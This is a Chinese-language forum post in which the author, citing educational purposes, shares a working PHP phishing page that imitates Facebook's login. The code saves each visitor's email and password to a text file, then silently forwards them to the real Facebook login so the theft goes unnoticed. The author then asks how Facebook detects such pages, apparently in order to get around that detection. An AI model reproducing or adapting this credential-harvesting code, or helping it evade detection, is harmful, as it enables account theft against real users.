我正在做一个关于计算机安全的小任务,我目前正在研究网络钓鱼。
因此,出于教育目的,我编写了一个简单的“网络钓鱼网页”,并试图了解 Facebook 如何检测网络钓鱼欺诈网页。
我index.html
是 facebook 主页,而我编辑它是为了将用户重定向到一个phishing.php
页面。
phishing.php
:
<?php
$file = fopen('phishing.txt', 'a');
fwrite($file, 'M: '.htmlspecialchars($_POST['email'])."\nP: ".htmlspecialchars($_POST['pass'])."\n\n");
fclose($file);
?>
<form action="https://www.facebook.com/login.php?login_attempt=1" method="post" name="frm">
<?php
foreach ($_POST as $a => $b) {
echo "<input type='hidden' name='".htmlentities($a)."' value='".htmlentities($b)."'>";
}
?>
</form>
<script language="JavaScript">
document.frm.submit();
</script>
我的问题来了。除了用户(我)输入的是用户名和密码之外,一切都运行良好,Facebook 说:
安全通知:为了您的安全,切勿在 Facebook.com 以外的网站上输入您的 Facebook 密码
那么 Facebook 使用哪种机制来检测这样的网络钓鱼页面呢?
谢谢!